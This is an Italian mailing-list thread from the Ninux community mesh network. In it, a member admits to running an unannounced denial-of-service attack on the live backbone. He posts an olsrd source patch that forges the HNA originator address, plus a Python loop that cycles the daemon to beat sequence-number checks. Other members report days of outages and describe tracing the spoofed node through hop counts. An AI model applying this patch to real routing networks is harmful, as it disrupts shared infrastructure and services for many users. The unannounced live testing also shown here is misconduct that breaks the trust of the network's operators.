[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Andrea Pescetelli andrea.pescetelli a gmail.com
Dom 25 Maggio 2014 09:37:24 CEST


Ciao
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e
comportamenti che da una settimana stanno invalidando sia il rispetto
reciproco sia il buon finzionamento della rete stessa da parte di Saverio
Proto.
Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha scritto:

> Non è qualche ora. Va avanti da giovedì mattina.
> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
> Jabber è stato ko da giovedì per sta cosa.
> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>
>> Ciao,
>>
>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>> informazioni tecniche interessanti.
>>
>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>
>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>
>> diff --git a/src/build_msg.c b/src/build_msg.c
>> index 109f955..e252981 100644
>> --- a/src/build_msg.c
>> +++ b/src/build_msg.c
>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>    m = (union olsr_message *)msg_buffer;
>>
>>    /* Fill header */
>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>> +  struct in_addr fakesource;
>> +  fakesource.s_addr = 0;
>> +  //inet_hton(2956867021,&fakesource);
>> +  inet_aton("172.16.40.40",&fakesource);
>> +  m->v4.originator = fakesource.s_addr;
>>    m->v4.hopcnt = 0;
>>    m->v4.ttl = MAX_TTL;
>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>
>>
>> una domanda,
>>
>> se avessi patchato anche:
>>
>> m->v4.hopcnt = XXX
>>
>> mettendo numeri casuali..
>>
>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>> messaggi ?
>>
>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>> che vorrei provare è DrDoS su snmp).
>>
>> un problema di questo attacco sono cmq i sequence number. Per rendere
>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>> OLSR a singhiozzo:
>>
>> import os
>> import time
>>
>> while True:
>>         os.system("olsrd")
>>         print "started\n"
>>         time.sleep(120)
>>         os.system("killall olsrd")
>>         print "killed\n"
>>         time.sleep(300)
>>
>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>> come out of sequence.
>>
>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>> parte di come ti costruisce l'attacco e voi la parte di come avete
>> fatto ad identificare il nodo spoofato ?
>>
>> ho staccatto il nodo attaccante, il gioco è finito :)
>>
>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>
>> ciao :)
>>
>> Saverio
>>
>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>> <andrea.pescetelli a gmail.com> ha scritto:
>> > Saverio,
>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>> hna
>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>> > proveniente dal nodo in oggetto.
>> >
>> > Questo problema sta oscurando diversi servizi di ninux in farm
>> appartenenti
>> > a quella subnet.
>> >
>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>> > multipli.
>> > puoi verificare?
>> >
>> > Grazie
>> >
>> > Fish, Hispanico, Halino
>> > --
>> > Andrea Pescetelli aka Fish
>> > Skype: andrea5742
>> > Ninux int: 5001/5002
>> > Mobile: +39 3891156050
>> >
>> >
>> >
>> >
>>
>
> _______________________________________________
> Wireless mailing list
> Wireless a ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/3d2d00d6/attachment-0001.html>


Maggiori informazioni sulla lista Wireless